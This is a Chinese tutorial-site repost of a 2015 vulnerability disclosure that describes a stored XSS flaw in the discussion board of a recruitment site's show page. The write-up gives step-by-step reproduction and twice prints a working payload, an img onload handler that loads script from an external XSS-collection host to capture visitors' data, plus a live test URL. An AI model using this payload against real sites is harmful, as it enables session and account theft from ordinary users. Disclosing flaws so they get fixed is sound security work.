网站地图    收藏   

主页 > 后端 > 网站安全 >

大街网 非你莫属官网某板块储存型XSS 可获取用户

来源:自学PHP网    时间:2015-04-17 11:59 作者: 阅读:

[导读] 原来非你莫属的官网是大街网给提供的额,在大街网官方的某板块中也找到了几个,不过有限制,要是能突破了再提交。看了下大街网的漏洞,全是XSS,霸气啊!这里我再加一个。。。...

原来非你莫属的官网是大街网给提供的额,在大街网官方的某板块中也找到了几个,不过有限制,要是能突破了再提交。
 
看了下大街网的漏洞,全是XSS,霸气啊!这里我再加一个。。。
详细说明:1 百度非你莫属官网,可以看到是大街网的域名。
 
 
图1
 
 
 
2 进去之后选择讨论区板块。
 
图2
 
 
 
3 随便发个帖子,里面插张图,然后点击编辑,抓包。
 
图3 
 
 
 
4 修改post数据构造xss代码
 
图4
 
 
 
5 可以看到这里的空格会自动解析,所以构造的时候不要加空格。
 
图5
 
 
 
6 搞定之后用F12查看有么有成功(其实这个是在开始测试的时候就要看能不能插入,有么有过滤)
 
图6 7
 
 
 
 
 
复制到外部txt中的代码(新手请不要直接在那里看,一定要用Copy as HTML复制出来看,因为那里看到的是解析过的,大牛可以用颜色区分)
 
 
<img src=http://up.2cto.com/2013/0220/20130220030323905.jpg" onload="s=document.createElement('script');s.src='http://xsser.me/Du8ka9?'+Math.random();document.body.appendChild(s)" border="0">
 
7 大功告成的效果,看起来一个很正常的帖子,点击就中招了。
 
图8 9 



 
 
 
 
 
 
 
END 

1 测试地址,自己看,看完删掉。http://fnms.dajie.com/fnms/discuss/topic/162281/detail
 
 
2 构造后的恶意代码。
 
 
<img src=http://up.2cto.com/2013/0220/20130220030323905.jpg" onload="s=document.createElement('script');s.src='http://xsser.me/Du8ka9?'+Math.random();document.body.appendChild(s)" border="0">
 
3 附一张霸气的图,大街网目前9个漏洞都是XSS,霸气啊!本人习惯,挖一个网站之前,先在乌云看下厂商之前的漏洞。希望大街网可以对安全重视,100%的XSS漏洞已经很能说明问题了。
 
 
 
修复方案:

过滤 
 

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论